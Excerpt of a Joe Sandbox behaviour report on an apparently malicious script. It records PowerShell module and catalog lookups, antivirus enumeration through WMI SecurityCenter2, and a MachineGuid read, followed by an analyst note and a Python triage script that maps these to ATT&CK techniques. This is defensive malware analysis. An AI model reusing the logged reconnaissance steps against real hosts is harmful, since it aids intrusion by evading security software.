Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.SqlXml\v4.0_4.0.0.0__b77a5c561934e089\System.Data.SqlXml.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\conhost.exe Code function: 47_2_0000024D9FF78030 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 47_2_0000024D9FF78030
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: Amcache.hve.11.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.11.dr Binary or memory string: msmpeng.exe
Source: Amcache.hve.11.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.11.dr Binary or memory string: MsMpEng.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
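Analyst note and added example (not part of the Joe Sandbox output). The root\SecurityCenter2 / AntiVirusProduct query is the standard way a script enumerates the antivirus products registered with Windows Security Center, and the two spellings seen above (AntiVirusProduct and AntivirusProduct) suggest that two distinct script stages issued them; the MachineGuid value read by wscript.exe is a stable per-installation identifier commonly used as a victim ID; the conhost.exe sequence GetSystemTimeAsFileTime, GetCurrentThreadId, GetCurrentProcessId, QueryPerformanceCounter is the MSVC stack-cookie (/GS) initialisation and is benign on its own; the MsMpEng.exe strings come from the Amcache.hve file captured on the analysis host, not from the sample's code; and the long run of volume-information queries against CatRoot .cat files and GAC assemblies is consistent with PowerShell loading modules and checking their signatures, so it carries little signal by itself. The Python below, written for this page and not shipped by Joe Sandbox, parses a constructed handful of lines in the report's own format, collapses verbatim repeats while keeping a count (identical lines here come from separate PowerShell instances), and maps the discovery behaviour to MITRE ATT&CK ids (T1518.001 Security Software Discovery, T1082 System Information Discovery); those mappings, the function names and the root\cimv2 line in the sample input are this example's own choices.

```python
import re
from collections import Counter, OrderedDict

# Regexes for the three line shapes that appear in the report section above.
LINE_RE = re.compile(r"^Source: (?P<proc>\S+) (?P<rest>.+)$")
WMI_RE = re.compile(r"^WMI Queries: IWbemServices::ExecQuery - (?P<ns>\S+) : (?P<query>.+)$")
REG_RE = re.compile(r"^Key value queried: (?P<key>\S+) (?P<value>\S+)$")
VOL_RE = re.compile(r"^Queries volume information: (?P<path>.+) VolumeInformation$")

# Constructed input in the report's format. The first six lines mirror entry types
# seen in the report; the root\cimv2 line is invented here to exercise the fallback.
SAMPLE_LINES = r"""
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_OperatingSystem
"""


def parse_line(line):
    """Parse one 'Source: <process> <behaviour>' line into a dict, or None if it is not one."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    proc, rest = m.group("proc"), m.group("rest")
    w = WMI_RE.match(rest)
    if w:
        return {"process": proc, "kind": "wmi", "namespace": w.group("ns"), "query": w.group("query")}
    r = REG_RE.match(rest)
    if r:
        return {"process": proc, "kind": "registry", "key": r.group("key"), "value": r.group("value")}
    v = VOL_RE.match(rest)
    if v:
        return {"process": proc, "kind": "volume", "path": v.group("path")}
    return None


def classify(ev):
    """Map a parsed event to (ATT&CK technique id or None, description).
    The mappings are this example's analyst judgement, not sandbox output."""
    if ev["kind"] == "wmi":
        ns, q = ev["namespace"].lower(), ev["query"].lower()
        if ns == r"root\securitycenter2" and "antivirusproduct" in q:
            return "T1518.001", "Security Software Discovery: AV products enumerated via root\\SecurityCenter2"
        return None, "Other WMI query; review the queried class by hand"
    if ev["kind"] == "registry" and ev["value"].lower() == "machineguid":
        return "T1082", "System Information Discovery: MachineGuid read (stable per-install host identifier)"
    if ev["kind"] == "volume":
        return None, "Volume information query; module/catalog loading noise unless correlated with more"
    return None, "Unclassified"


def triage(text):
    """Collapse verbatim repeats (separate PowerShell instances emit identical lines),
    keep a count per distinct event, and attach the classification."""
    counts = Counter()
    first = OrderedDict()
    for line in text.splitlines():
        ev = parse_line(line)
        if ev is None:
            continue
        key = tuple(sorted(ev.items()))
        counts[key] += 1
        first.setdefault(key, ev)
    findings = []
    for key, ev in first.items():
        tid, desc = classify(ev)
        findings.append({"process": ev["process"], "kind": ev["kind"],
                         "technique": tid, "description": desc, "count": counts[key]})
    return findings


def high_signal(findings):
    """Only the findings that map to a technique; the volume/catalog noise is dropped."""
    return [f for f in findings if f["technique"] is not None]


if __name__ == "__main__":
    for f in triage(SAMPLE_LINES):
        print(f"{f['count']:>2}x {f['technique'] or '-':<10} {f['kind']:<8} {f['description']}")
```

Run against the full behaviour list of a report, the counts show at a glance how many PowerShell instances repeated the AV enumeration, while high_signal() leaves the analyst with the two discovery behaviours worth writing up rather than a hundred catalog-file lookups.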